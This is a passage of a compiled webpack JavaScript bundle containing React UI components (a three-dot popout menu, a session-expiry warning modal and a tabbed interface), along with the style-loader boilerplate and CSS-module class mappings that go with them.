	"search": "Table__search__1B8UoR",
	"searchIcon": "Table__searchIcon__fg-OLZ",
	"HeaderRow": "Table__HeaderRow__fDCYXR",
	"TableRow": "Table__TableRow__DlDLWU",
	"HeaderCell": "Table__HeaderCell__3hIbAT",
	"TableContainer": "Table__TableContainer__1FM28m",
	"TableContent": "Table__TableContent__2LVz-C",
	"Cell": "Table__Cell__1_qqW9",
	"CustomTableInfo": "Table__CustomTableInfo__3bglWR",
	"SortControls": "Table__SortControls__1WY6Kh",
	"Select": "Table__Select__1ha7Gi",
	"title": "Table__title__26RIgQ",
	"RolesSelect": "Table__RolesSelect__3TM9tF",
	"green": "Table__green__2OlhK5",
	"yellow": "Table__yellow__Rexgmo",
	"blue": "Table__blue__3nz2l6",
	"red": "Table__red__Ovpmzu",
	"gray": "Table__gray__3m_FmN"
};

/***/ }),
/* 3628 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return PopoutActionsMenu; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_classnames_bind__ = __webpack_require__(39);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_classnames_bind___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_classnames_bind__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__PopoutActionsMenu_styl__ = __webpack_require__(3629);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__PopoutActionsMenu_styl___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2__PopoutActionsMenu_styl__);
var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }();

function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }

function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; }

function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; }





var cx = __WEBPACK_IMPORTED_MODULE_1_classnames_bind___default.a.bind(__WEBPACK_IMPORTED_MODULE_2__PopoutActionsMenu_styl___default.a);

/**
 * The three dots that when clicked expand into whatever is passed as children
 *
 * NOTE: This component does not (yet) account for window position. So if used
 * in other window areas it may expand below or to the left of the window. This
 * can be addressed if we end up needing it.
 */
var PopoutActionsMenu = function (_React$Component) {
  _inherits(PopoutActionsMenu, _React$Component);

  function PopoutActionsMenu() {
    var _ref;

    var _temp, _this, _ret;

    _classCallCheck(this, PopoutActionsMenu);

    for (var _len = arguments.length, args = Array(_len), _key = 0; _key < _len; _key++) {
      args[_key] = arguments[_key];
    }

    return _ret = (_temp = (_this = _possibleConstructorReturn(this, (_ref = PopoutActionsMenu.__proto__ || Object.getPrototypeOf(PopoutActionsMenu)).call.apply(_ref, [this].concat(args))), _this), _this.state = {
      isOpen: false
    }, _this.open = function (e) {
      e.stopPropagation();
      _this.setState(function () {
        return { isOpen: true };
      });
    }, _this.close = function () {
      return _this.setState(function () {
        return { isOpen: false };
      });
    }, _temp), _possibleConstructorReturn(_this, _ret);
  }

  _createClass(PopoutActionsMenu, [{
    key: 'render',
    value: function render() {
      var isOpen = this.state.isOpen;
      var _props = this.props,
          children = _props.children,
          className = _props.className,
          innerClassName = _props.innerClassName,
          contentClassName = _props.contentClassName;


      return __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
        'div',
        { onClick: this.close, 'data-cy': 'popoutActionsMenu', className: cx('PopoutActionsMenu', className, { isOpen: isOpen }) },
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
          'div',
          { onClick: this.open, className: cx('dots', innerClassName, { isOpen: isOpen }) },
          __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('span', null),
          __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('span', null),
          __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('span', null)
        ),
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"]('div', { onClick: this.close, className: cx('backdrop', { isOpen: isOpen }) }),
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
          'div',
          { className: cx('popout', contentClassName, { isOpen: isOpen }) },
          children
        )
      );
    }
  }]);

  return PopoutActionsMenu;
}(__WEBPACK_IMPORTED_MODULE_0_react__["Component"]);

/***/ }),
/* 3629 */
/***/ (function(module, exports, __webpack_require__) {

// style-loader: Adds some css to the DOM by adding a <style> tag

// load the styles
var content = __webpack_require__(3630);
if(typeof content === 'string') content = [[module.i, content, '']];
// Prepare cssTransformation
var transform;

var options = {"hmr":true}
options.transform = transform
// add the styles to the DOM
var update = __webpack_require__(28)(content, options);
if(content.locals) module.exports = content.locals;
// Hot Module Replacement
if(false) {
	// When the styles change, update the <style> tags
	if(!content.locals) {
		module.hot.accept("!!../../../node_modules/css-loader/index.js??ref--2-1!../../../node_modules/postcss-loader/src/index.js??ref--2-2!../../../node_modules/stylus-loader/index.js!./PopoutActionsMenu.styl", function() {
			var newContent = require("!!../../../node_modules/css-loader/index.js??ref--2-1!../../../node_modules/postcss-loader/src/index.js??ref--2-2!../../../node_modules/stylus-loader/index.js!./PopoutActionsMenu.styl");
			if(typeof newContent === 'string') newContent = [[module.id, newContent, '']];
			update(newContent);
		});
	}
	// When the module is disposed, remove the <style> tags
	module.hot.dispose(function() { update(); });
}

/***/ }),
/* 3630 */
/***/ (function(module, exports, __webpack_require__) {

exports = module.exports = __webpack_require__(27)(undefined);
// imports


// module
exports.push([module.i, ".PopoutActionsMenu__PopoutActionsMenu__1GpX7A {\n  display: block;\n  position: absolute;\n  top: 20px;\n  right: 30px;\n}\n.PopoutActionsMenu__dots__1LD__e {\n  padding: 8px;\n  border: 1px solid;\n  border-color: transparent;\n}\n.PopoutActionsMenu__dots__1LD__e:hover {\n  background: rgba(255,255,255,0.2);\n}\n.PopoutActionsMenu__dots__1LD__e.PopoutActionsMenu__isOpen__24GoIm {\n  background: rgba(0,0,0,0.2);\n}\n.PopoutActionsMenu__dots__1LD__e span {\n  display: block;\n  width: 4px;\n  height: 4px;\n  border-radius: 4px;\n  background: #fff;\n}\n.PopoutActionsMenu__dots__1LD__e span:not(:last-child) {\n  margin-bottom: 4px;\n}\n.PopoutActionsMenu__backdrop__1Zqbwd {\n  position: fixed;\n  top: 0;\n  left: 0;\n  right: 0;\n  bottom: 0;\n  background: transparent;\n  z-index: 1;\n  opacity: 0;\n  pointer-events: none;\n}\n.PopoutActionsMenu__backdrop__1Zqbwd.PopoutActionsMenu__isOpen__24GoIm {\n  opacity: 1;\n  pointer-events: all;\n}\n.PopoutActionsMenu__popout__3C9Mnq {\n  position: absolute;\n  top: calc(100% + 22px);\n  left: 0;\n  z-index: 250;\n  -webkit-transform: translate(-44%, -70%) scale(0);\n          transform: translate(-44%, -70%) scale(0);\n  min-width: 180px;\n  border: 1px solid #e8ebed;\n  border-radius: 3px;\n  opacity: 0;\n  pointer-events: none;\n  background: #fff;\n  transition: opacity 0.2s ease-out, -webkit-transform 0.2s ease-out;\n  transition: transform 0.2s ease-out, opacity 0.2s ease-out;\n  transition: transform 0.2s ease-out, opacity 0.2s ease-out, -webkit-transform 0.2s ease-out;\n}\n.PopoutActionsMenu__popout__3C9Mnq:before {\n  content: '';\n  position: absolute;\n  top: 0;\n  right: 10px;\n  border: 18px solid transparent;\n  border-bottom-color: #e8ebed;\n  -webkit-transform: translateY(-100%);\n          transform: translateY(-100%);\n}\n.PopoutActionsMenu__popout__3C9Mnq:after {\n  content: '';\n  position: absolute;\n  top: 0;\n  right: 12px;\n  border: 16px solid transparent;\n  border-bottom-color: #fff;\n  -webkit-transform: translateY(-100%);\n          transform: translateY(-100%);\n}\n.PopoutActionsMenu__popout__3C9Mnq.PopoutActionsMenu__isOpen__24GoIm {\n  opacity: 1;\n  pointer-events: all;\n  -webkit-transform: translate(-78%, 0%) scale(1);\n          transform: translate(-78%, 0%) scale(1);\n}\n", ""]);

// exports
exports.locals = {
	"PopoutActionsMenu": "PopoutActionsMenu__PopoutActionsMenu__1GpX7A",
	"dots": "PopoutActionsMenu__dots__1LD__e",
	"isOpen": "PopoutActionsMenu__isOpen__24GoIm",
	"backdrop": "PopoutActionsMenu__backdrop__1Zqbwd",
	"popout": "PopoutActionsMenu__popout__3C9Mnq"
};

/***/ }),
/* 3631 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return SessionExpiryWarning; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_classnames_bind__ = __webpack_require__(39);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_classnames_bind___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_classnames_bind__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__SessionExpiryWarning_styl__ = __webpack_require__(3632);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__SessionExpiryWarning_styl___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2__SessionExpiryWarning_styl__);
var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }();

function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }

function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; }

function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; }





var cx = __WEBPACK_IMPORTED_MODULE_1_classnames_bind___default.a.bind(__WEBPACK_IMPORTED_MODULE_2__SessionExpiryWarning_styl___default.a);

var SessionExpiryWarning = function (_React$Component) {
  _inherits(SessionExpiryWarning, _React$Component);

  function SessionExpiryWarning() {
    _classCallCheck(this, SessionExpiryWarning);

    return _possibleConstructorReturn(this, (SessionExpiryWarning.__proto__ || Object.getPrototypeOf(SessionExpiryWarning)).apply(this, arguments));
  }

  _createClass(SessionExpiryWarning, [{
    key: 'render',
    value: function render() {
      var removeTimeoutWarning = this.props.removeTimeoutWarning;

      return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
        'div',
        {
          className: cx('SessionExpiryWarning'),
          onClick: removeTimeoutWarning },
        __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
          'div',
          { className: cx('inner') },
          __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
            'div',
            { className: cx('warning') },
            __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
              'strong',
              null,
              'WARNING:'
            ),
            ' Session expiring soon'
          ),
          __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
            'p',
            null,
            'You will be logged out soon and ',
            __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
              'strong',
              null,
              'any unsaved work will be lost'
            ),
            '. Click anywhere to remain logged in.'
          )
        )
      );
    }
  }]);

  return SessionExpiryWarning;
}(__WEBPACK_IMPORTED_MODULE_0_react___default.a.Component);

/***/ }),
/* 3632 */
/***/ (function(module, exports, __webpack_require__) {

// style-loader: Adds some css to the DOM by adding a <style> tag

// load the styles
var content = __webpack_require__(3633);
if(typeof content === 'string') content = [[module.i, content, '']];
// Prepare cssTransformation
var transform;

var options = {"hmr":true}
options.transform = transform
// add the styles to the DOM
var update = __webpack_require__(28)(content, options);
if(content.locals) module.exports = content.locals;
// Hot Module Replacement
if(false) {
	// When the styles change, update the <style> tags
	if(!content.locals) {
		module.hot.accept("!!../../../node_modules/css-loader/index.js??ref--2-1!../../../node_modules/postcss-loader/src/index.js??ref--2-2!../../../node_modules/stylus-loader/index.js!./SessionExpiryWarning.styl", function() {
			var newContent = require("!!../../../node_modules/css-loader/index.js??ref--2-1!../../../node_modules/postcss-loader/src/index.js??ref--2-2!../../../node_modules/stylus-loader/index.js!./SessionExpiryWarning.styl");
			if(typeof newContent === 'string') newContent = [[module.id, newContent, '']];
			update(newContent);
		});
	}
	// When the module is disposed, remove the <style> tags
	module.hot.dispose(function() { update(); });
}

/***/ }),
/* 3633 */
/***/ (function(module, exports, __webpack_require__) {

exports = module.exports = __webpack_require__(27)(undefined);
// imports


// module
exports.push([module.i, "/* **************************************************************************\n * SessionExpiryWarning\n * *************************************************************************/\n.SessionExpiryWarning__warning__2dYiyR {\n  background: #fcf8e3;\n  border: 1px solid #dcbf8c;\n  color: #8a6d3b;\n  width: 100%;\n}\n.SessionExpiryWarning__warning__2dYiyR:hover {\n  color: #4a4a4a;\n  background-color: #fbf6da;\n  border-color: #cba055;\n}\n.SessionExpiryWarning__warning__2dYiyR button {\n  color: #e1dab7;\n}\n.SessionExpiryWarning__warning__2dYiyR button:hover {\n  color: #c9bc7d;\n}\n.SessionExpiryWarning__SessionExpiryWarning__4GkMSh {\n  position: fixed;\n  top: 0;\n  left: 0;\n  right: 0;\n  bottom: 0;\n  background: rgba(0,0,0,0.2);\n  z-index: 9999;\n  font-size: 18px;\n  border-radius: 3px;\n}\n.SessionExpiryWarning__SessionExpiryWarning__4GkMSh .SessionExpiryWarning__warning__2dYiyR {\n  border-radius: 0px;\n  padding: 20px;\n  box-shadow: none;\n}\n.SessionExpiryWarning__SessionExpiryWarning__4GkMSh .SessionExpiryWarning__inner__1sBDrS {\n  background: #fff;\n  position: absolute;\n  top: 50%;\n  left: 50%;\n  box-shadow: 0px 3px 5px 0px rgba(0,0,0,0.27);\n  -webkit-transform: translate(-50%, -50%);\n          transform: translate(-50%, -50%);\n}\n.SessionExpiryWarning__SessionExpiryWarning__4GkMSh p {\n  color: #4a4a4a;\n  padding: 0 20px;\n}\n.SessionExpiryWarning__SessionExpiryWarning__4GkMSh p strong {\n  color: #d13f19;\n}\n", ""]);

// exports
exports.locals = {
	"warning": "SessionExpiryWarning__warning__2dYiyR",
	"SessionExpiryWarning": "SessionExpiryWarning__SessionExpiryWarning__4GkMSh",
	"inner": "SessionExpiryWarning__inner__1sBDrS"
};

/***/ }),
/* 3634 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return TabbedUI; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_classnames_bind__ = __webpack_require__(39);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_classnames_bind___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_classnames_bind__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__TabbedUI_styl__ = __webpack_require__(3635);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__TabbedUI_styl___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2__TabbedUI_styl__);
var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };

var _createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }();

function _objectWithoutProperties(obj, keys) { var target = {}; for (var i in obj) { if (keys.indexOf(i) >= 0) continue; if (!Object.prototype.hasOwnProperty.call(obj, i)) continue; target[i] = obj[i]; } return target; }

function _classCallCheck(instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }

function _possibleConstructorReturn(self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; }

function _inherits(subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; }





var cx = __WEBPACK_IMPORTED_MODULE_1_classnames_bind___default.a.bind(__WEBPACK_IMPORTED_MODULE_2__TabbedUI_styl___default.a);

/**
 * This is just responsible for defining expected prop types and rendering
 * children
 */

var Tab = function (_React$PureComponent) {
  _inherits(Tab, _React$PureComponent);

  function Tab() {
    _classCallCheck(this, Tab);

    return _possibleConstructorReturn(this, (Tab.__proto__ || Object.getPrototypeOf(Tab)).apply(this, arguments));
  }

  _createClass(Tab, [{
    key: 'render',
    value: function render() {
      return this.props.children;
    }
  }]);

  return Tab;
}(__WEBPACK_IMPORTED_MODULE_0_react__["PureComponent"]);

/**
 * Creates a horizontal tabbed UI. This is a controlled component: both
 * activeTab and onChange props are mandatory.
 *
 * The children of the active tab will be rendered. The active tab is determined
 * by the activeTab prop and the various activeKey props of each tab
 */


var TabbedUI = function (_React$PureComponent2) {
  _inherits(TabbedUI, _React$PureComponent2);

  function TabbedUI() {
    _classCallCheck(this, TabbedUI);

    return _possibleConstructorReturn(this, (TabbedUI.__proto__ || Object.getPrototypeOf(TabbedUI)).apply(this, arguments));
  }

  _createClass(TabbedUI, [{
    key: 'render',
    value: function render() {
      var _props = this.props,
          activeTab = _props.activeTab,
          onChange = _props.onChange,
          className = _props.className,
          innerClassName = _props.innerClassName,
          _children = _props.children,
          props = _objectWithoutProperties(_props, ['activeTab', 'onChange', 'className', 'innerClassName', 'children']);

      var children = __WEBPACK_IMPORTED_MODULE_0_react__["Children"].toArray(_children);
      var activeChild = children.find(function (_ref) {
        var childProps = _ref.props;
        return childProps.activeKey === activeTab;
      });

      return __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
        'div',
        _extends({ className: cx('TabbedUI', className) }, props),
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
          'nav',
          { className: cx('tabs') },
          children.map(function (_ref2) {
            var childProps = _ref2.props;

            var isActive = childProps.activeKey === activeTab;
            return __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
              'div',
              {
                key: childProps.activeKey,
                className: cx('tab', { active: isActive }),
                onClick: function onClick(e) {
                  onChange(childProps.activeKey, e);
                  if (isActive && childProps.onActiveClick) {
                    childProps.onActiveClick(e);
                  }
                } },
              childProps.title
            );
          })
        ),
        __WEBPACK_IMPORTED_MODULE_0_react__["createElement"](
          'div',
          { className: cx('activeChild', innerClassName) },
          activeChild
        )
      );
    }
  }]);

  return TabbedUI;
}(__WEBPACK_IMPORTED_MODULE_0_react__["PureComponent"]);
TabbedUI.Tab = Tab;
TabbedUI.defaultProps = {
  innerClassName: ''
};

/***/ }),
/* 3635 */
/***/ (function(module, exports, __webpack_require__) {

// style-loader: Adds some css to the DOM by adding a <style> tag

// load the styles
var content = __webpack_require__(3636);
if(typeof content === 'string') content = [[module.i, content, '']];
// Prepare cssTransformation
var transform;

var options = {"hmr":true}
options.transform = transform
// add the styles to the DOM
var update = __webpack_require__(28)(content, options);
if(content.locals) module.exports = content.locals;
// Hot Module Replacement
if(false) {
	// When the styles change, update the <style> tags
	if(!content.locals) {
		module.hot.accept("!!../../../node_modules/css-loader/index.js??ref--2-1!../../../node_modules/postcss-loader/src/index.js??ref--2-2!../../../node_modules/stylus-loader/index.js!./TabbedUI.styl", function() {
			var newContent = require("!!../../../node_modules/css-loader/index.js??ref--2-1!../../../node_modules/postcss-loader/src/index.js??ref--2-2!../../../node_modules/stylus-loader/index.js!./TabbedUI.styl");
			if(typeof newContent === 'string') newContent = [[module.id, newContent, '']];
			update(newContent);
		});
	}
	// When the module is disposed, remove the <style> tags
	module.hot.dispose(function() { update(); });
}

/***/ }),
/* 3636 */
/***/ (function(module, exports, __webpack_require__) {

exports = module.exports = __webpack_require__(27)(undefined);
// imports


// module
exports.push([module.i, ".dark .TabbedUI__tabs__1GSQ6c {\n  background: #464646;\n  color: #fff;\n  border-bottom-color: #565656;\n  border-top-color: #565656;\n}\n.dark .TabbedUI__tab__11AhWa:hover {\n  background: rgba(0,0,0,0.2);\n  color: #fff;\n}\n.dark .TabbedUI__tab__11AhWa.TabbedUI__active__3x3l4W {\n  color: #fff;\n}\n.TabbedUI__tabs__1GSQ6c {\n  display: flex;\n  width: 100%;\n  background: #fff;\n  color: #8e8e8e;\n  border-bottom: 1px solid #e8ebed;\n  border-top: 1px solid #e8ebed;\n  flex-grow: 0;\n  flex-shrink: 0;\n}\n.TabbedUI__tab__11AhWa {\n  padding: 15px 0;\n  flex: 1;\n  display: flex;\n  justify-content: center;\n  align-items: center;\n  text-align: center;\n  font-size: 14px;\n  font-weight: 300;\n  letter-spacing: 1px;\n  line-height: 1;\n  border-radius: 0;\n  border: none;\n  border-bottom: 3px solid transparent;\n  border-left: none;\n  cursor: pointer;\n}\n.TabbedUI__tab__11AhWa:first-child {\n  width: 45%;\n}\n.TabbedUI__tab__11AhWa:last-child {\n  width: 55%;\n}\n.TabbedUI__tab__11AhWa:hover {\n  background: #fafafa;\n  color: #4a4a4a;\n}\n.TabbedUI__tab__11AhWa.TabbedUI__active__3x3l4W {\n  border-bottom-color: #fff;\n  color: #4a4a4a;\n}\n", ""]);

// exports
exports.locals = {
	"tabs": "TabbedUI__tabs__1GSQ6c",
	"tab": "TabbedUI__tab__11AhWa",
	"active": "TabbedUI__active__3x3l4W"
};

/***/ }),
/* 3637 */
/***/ (function(module, exports, __webpack_require__) {

// style-loader: Adds some css to the DOM by adding a <style> tag

// load the styles
var content = __webpack_require__(3638);
if(typeof content === 'string') content = [[module.i, content, '']];
// Prepare cssTransformation
var transform;

var options = {"hmr":true}
options.transform = transform
// add the styles to the DOM
var update = __webpack_require__(28)(content, options);
if(content.locals) module.exports = content.locals;
// Hot Module Replacement
if(false) {
	// When the styles change, update the <style> tags
	if(!content.locals) {
		module.hot.accept("!!../../../node_modules/css-loader/index.js??ref--2-1!../../../node_modules/postcss-loader/src/index.js??ref--2-2!../../../node_modules/stylus-loader/index.js!./EnclaveIcon.styl", function() {
			var newContent = require("!!../../../node_modules/css-loader/index.js??ref--2-1!../../../node_modules/postcss-loader/src/index.js??ref--2-2!../../../node_modules/stylus-loader/index.js!./EnclaveIcon.styl");
			if(typeof newContent === 'string') newContent = [[module.id, newContent, '']];
			update(newContent);
		});
	}
	// When the module is disposed, remove the <style> tags
	module.hot.dispose(function() { update(); });
}

/***/ }),
/* 3638 */
/***/ (function(module, exports, __webpack_require__) {

exports = module.exports = __webpack_require__(27)(undefined);
// imports


// module
exports.push([module.i, ".EnclaveIcon__container__18G0zB {\n  display: block;\n  overflow: hidden;\n  width: 26px;\n  height: 26px;\n  border-radius: 26px;\n  position: relative;\n  z-index: 0;\n  flex-grow: 0;\n  flex-shrink: 0;\n}\n.EnclaveIcon__container__18G0zB.EnclaveIcon__red__qj7D9I {\n  border: 2px solid #d13f19;\n  background: rgba(209,63,25,0.3);\n}\n.EnclaveIcon__container__18G0zB.EnclaveIcon__red__qj7D9I .EnclaveIcon__innerSlice__1Tz8JE {\n  background: #d13f19;\n}\n.EnclaveIcon__container__18G0zB.EnclaveIcon__blue__MK1r6l {\n  border: 2px solid #245da7;\n  background: rgba(36,93,167,0.3);\n}\n.EnclaveIcon__container__18G0zB.EnclaveIcon__blue__MK1r6l .EnclaveIcon__innerSlice__1Tz8JE {\n  background: #245da7;\n}\n.EnclaveIcon__container__18G0zB.EnclaveIcon__orange__27SZ7O {\n  border: 2px solid #ffbb78;\n  background: rgba(255,187,120,0.3);\n}\n.EnclaveIcon__container__18G0zB.EnclaveIcon__orange__27SZ7O .EnclaveIcon__innerSlice__1Tz8JE {\n  background: #ffbb78;\n}\n.EnclaveIcon__container__18G0zB.EnclaveIcon__gold__3lu9d2 {\n  border: 2px solid #ffd700;\n  background: rgba(255,215,0,0.3);\n}\n.EnclaveIcon__container__18G0zB.EnclaveIcon__gold__3lu9d2 .EnclaveIcon__innerSlice__1Tz8JE {\n  background: #ffd700;\n}\n.EnclaveIcon__container__18G0zB.EnclaveIcon__pink__1ST477 {\n  border: 2px solid #e377c2;\n  background: rgba(227,119,194,0.3);\n}\n.EnclaveIcon__container__18G0zB.EnclaveIcon__pink__1ST477 .EnclaveIcon__innerSlice__1Tz8JE {\n  background: #e377c2;\n}\n.EnclaveIcon__container__18G0zB.EnclaveIcon__green__2dYeCv {\n  border: 2px solid #74c476;\n  background: rgba(116,196,118,0.3);\n}\n.EnclaveIcon__container__18G0zB.EnclaveIcon__green__2dYeCv .EnclaveIcon__innerSlice__1Tz8JE {\n  background: #74c476;\n}\n.EnclaveIcon__container__18G0zB.EnclaveIcon__light-purple__3uwl8k {\n  border: 2px solid #c5b0d5;\n  background: rgba(197,176,213,0.3);\n}\n.EnclaveIcon__container__18G0zB.EnclaveIcon__light-purple__3uwl8k .EnclaveIcon__innerSlice__1Tz8JE {\n  background: #c5b0d5;\n}\n.EnclaveIcon__container__18G0zB.EnclaveIcon__dark-green__1qbOOy {\n  border: 2px solid #2ca02c;\n  background: rgba(44,160,44,0.3);\n}\n.EnclaveIcon__container__18G0zB.EnclaveIcon__dark-green__1qbOOy .EnclaveIcon__innerSlice__1Tz8JE {\n  background: #2ca02c;\n}\n.EnclaveIcon__container__18G0zB.EnclaveIcon__purple__UT1QbQ {\n  border: 2px solid #8b216b;\n  background: rgba(139,33,107,0.3);\n}\n.EnclaveIcon__container__18G0zB.EnclaveIcon__purple__UT1QbQ .EnclaveIcon__innerSlice__1Tz8JE {\n  background: #8b216b;\n}\n.EnclaveIcon__container__18G0zB.EnclaveIcon__teal__kIBwQL {\n  border: 2px solid #17becf;\n  background: rgba(23,190,207,0.3);\n}\n.EnclaveIcon__container__18G0zB.EnclaveIcon__teal__kIBwQL .EnclaveIcon__innerSlice__1Tz8JE {\n  background: #17becf;\n}\n.EnclaveIcon__container__18G0zB.EnclaveIcon__focus-blue__1BpsU6 {\n  border: 2px solid #528bff;\n  background: rgba(82,139,255,0.3);\n}\n.EnclaveIcon__container__18G0zB.EnclaveIcon__focus-blue__1BpsU6 .EnclaveIcon__innerSlice__1Tz8JE {\n  background: #528bff;\n}\n.EnclaveIcon__container__18G0zB.EnclaveIcon__dark-brown__1BOk5B {\n  border: 2px solid #8c564b;\n  background: rgba(140,86,75,0.3);\n}\n.EnclaveIcon__container__18G0zB.EnclaveIcon__dark-brown__1BOk5B .EnclaveIcon__innerSlice__1Tz8JE {\n  background: #8c564b;\n}\n.EnclaveIcon__container__18G0zB.EnclaveIcon__gray__3sTmhj {\n  border: 2px solid #aaa;\n  background: rgba(170,170,170,0.3);\n}\n.EnclaveIcon__container__18G0zB.EnclaveIcon__gray__3sTmhj .EnclaveIcon__innerSlice__1Tz8JE {\n  background: #aaa;\n}\n.EnclaveIcon__container__18G0zB img {\n  position: absolute;\n  z-index: 1;\n  top: 50%;\n  left: 50%;\n  -webkit-transform: translate(-50%, -50%);\n          transform: translate(-50%, -50%);\n  display: block;\n  height: 26px;\n  width: auto;\n  background: #fff;\n}\n.EnclaveIcon__container__18G0zB span {\n  z-index: 100;\n  display: flex;\n  justify-content: center;\n  align-items: center;\n  font-size: 9px;\n  padding-top: 1px;\n  padding-left: 1px;\n}\n.EnclaveIcon__innerSlice__1Tz8JE {\n  width: 100%;\n  height: 100%;\n  position: relative;\n  -webkit-transform: translate(40%, 40%) rotate3d(0, 0, 1, 45deg);\n          transform: translate(40%, 40%) rotate3d(0, 0, 1, 45deg);\n}\n", ""]);

// exports
exports.locals = {
	"container": "EnclaveIcon__container__18G0zB",
	"red": "EnclaveIcon__red__qj7D9I",
	"innerSlice": "EnclaveIcon__innerSlice__1Tz8JE",
	"blue": "EnclaveIcon__blue__MK1r6l",
